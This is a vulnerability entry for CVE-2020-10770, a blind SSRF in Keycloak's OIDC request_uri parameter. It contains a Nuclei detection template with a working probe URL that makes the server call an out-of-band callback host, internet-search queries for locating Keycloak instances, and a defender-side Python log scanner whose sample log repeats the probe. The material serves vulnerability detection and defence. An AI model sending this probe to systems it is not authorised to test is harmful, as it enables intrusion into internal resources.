Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
ID: CVE-2020-10770
Severity: medium
Author: dhiyaneshDk
Tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat
Description

Keycloak 12.0.1 and below allows an attacker to force the server to fetch an unverified URL supplied in the OIDC parameter request_uri of an authorization request. Because the server makes the outbound request itself and the response is not reflected to the caller, this is a blind server-side request forgery (SSRF); the template below confirms it through an out-of-band (OAST) interaction rather than from the HTTP response.
YAML Source

id: CVE-2020-10770

info:
  name: Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
  author: dhiyaneshDk
  severity: medium
  description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, or further attacks.
  remediation: |
    Upgrade Keycloak to a version higher than 12.0.1 to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html
    - https://www.exploit-db.com/exploits/50405
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10770
    - https://bugzilla.redhat.com/show_bug.cgi?id=1846270
    - https://github.com/soosmile/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-10770
    cwe-id: CWE-918
    epss-score: 0.16545
    epss-percentile: 0.96007
    cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: redhat
    product: keycloak
    shodan-query:
      - http.html:"keycloak"
      - http.title:"keycloak"
      - http.favicon.hash:-1105083093
    fofa-query:
      - title="keycloak"
      - icon_hash=-1105083093
      - body="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat

http:
  - method: GET
    path:
      - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/'

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a0048304602210087de40ac54e29dc6c51fe842835e5f465fa5422531c7710fc24ef9d50fb7753f0221009720b27a543e2dc69f71b4b8928c0d5d861cf32b5cb8698340e8376e9ba4a9f7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects CVE-2020-10770 in a Keycloak deployment. Run it with the Nuclei tool against the target base URL; a single GET is sent (max-request: 1), and the finding is reported only if the Keycloak server makes an outbound HTTP request to the interactsh callback host, which is what the interactsh_protocol matcher checks.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-10770.yaml"
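As an added example that is not part of the template or the Nuclei project, the following defender-side check scans constructed Keycloak access-log lines for the request shape this template sends: an OIDC authorization request whose request_uri points at a host outside an allow-list. The log format, host names and allow-list are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real traffic). The first one has the
# shape of the CVE-2020-10770 probe: request_uri pointing at an external host.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http%3A%2F%2Fabc123.oast.example%2F HTTP/1.1" 302 -
10.0.0.6 - - [01/Jan/2021:10:00:01 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=app&response_type=code&request_uri=https%3A%2F%2Fapp.internal.example%2Freq.jwt HTTP/1.1" 302 -
10.0.0.7 - - [01/Jan/2021:10:00:02 +0000] "GET /auth/realms/master/protocol/openid-connect/auth?client_id=app&response_type=code&redirect_uri=https%3A%2F%2Fapp.internal.example%2Fcb HTTP/1.1" 302 -
"""

# Common-log-format request line: client IP first, then the quoted request.
REQUEST_LINE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Keycloak OIDC authorization endpoint for any realm.
AUTH_PATH = re.compile(r"^/auth/realms/[^/]+/protocol/openid-connect/auth$")


def oidc_request_uris(log_text):
    """Return [(client_ip, request_uri)] for every authorization request whose
    query string carries a request_uri parameter (parse_qs percent-decodes it)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not AUTH_PATH.match(target.path):
            continue
        for value in parse_qs(target.query).get("request_uri", []):
            hits.append((m.group("ip"), value))
    return hits


def untrusted_request_uris(log_text, allowed_hosts):
    """Flag request_uri values whose host is not in allowed_hosts (assumed
    allow-list of hosts that legitimately serve request objects). A value with
    no parseable host (bare path, malformed URL) is treated as untrusted too."""
    flagged = []
    for ip, uri in oidc_request_uris(log_text):
        host = (urlsplit(uri).hostname or "").lower()
        if host not in allowed_hosts:
            flagged.append((ip, host or uri))
    return flagged


if __name__ == "__main__":
    for ip, host in untrusted_request_uris(SAMPLE_LOG, {"app.internal.example"}):
        print(f"possible request_uri SSRF probe from {ip} -> {host}")
```

On the sample input only the first line is flagged; the second uses an allow-listed host and the third carries no request_uri at all.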